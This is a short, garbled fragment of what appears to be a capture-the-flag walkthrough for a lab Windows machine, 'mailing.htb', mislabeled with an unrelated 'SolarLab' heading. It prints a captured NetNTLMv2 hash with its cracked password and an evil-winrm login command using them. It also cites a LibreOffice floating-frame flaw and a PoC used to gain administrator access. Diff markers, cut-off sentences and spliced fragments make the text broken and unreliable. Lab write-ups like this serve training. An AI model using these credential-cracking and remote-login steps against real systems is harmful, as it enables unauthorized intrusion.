SolarLab

 MAYA::MAILING:95de498996a31a8c:d2babc773ff653ee285d33e6fe5493a6:010100000000000080f2298488b6da015d1dcbb264e2490c0000000002000800530059005500490001001e00570049004e002d005a004f0042005000340036004d0038004b005600410004003400570049004e002d005a004f0042005000340036004d0038004b00560041002e0053005900550049002e004c004f00430041004c000300140053005900550049002e004c004f00430041004c000500140053005900550049002e004c004f00430041004c000700080080f2298488b6da0106000400020000000800300030000000000000000000000000200000c9e5bc0c7d84e948e12cf5d180e24c511c66b448ef8db310790edb6ad72669ff0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00370031000000000000000000:m4y4ngs4ri

-• We managed to dump a NTLM hash cred for maya.
+We managed to dump a NTLM hash cred for maya

 m4y4ngs4ri

-We can use this to evil-winrm onto the box and get our foothold
+onto the box and get our foothold

 evil-winrm -i mailing.htb -u maya -p 'm4y4ngs4ri'

-• Exploring around we find an interesting app installed in `Program Files`.
+for the user flag.Exploring around we find an interesting app installed in `Program Files`.

 LibreOffice

-• In affected versions of LibreOffice these floating frames fetch and display their linked document without prompt on loading the host document.
-Essentially you can load remote files without the user being prompted that a file is being loaded.
+In affected versions of LibreOffice these floating frames fetch and display their linked document without prompt on loading the host document.
+Essentially you can load remote files

 We can use this PoC to generate a malicious payload to execute and gain us administrator access.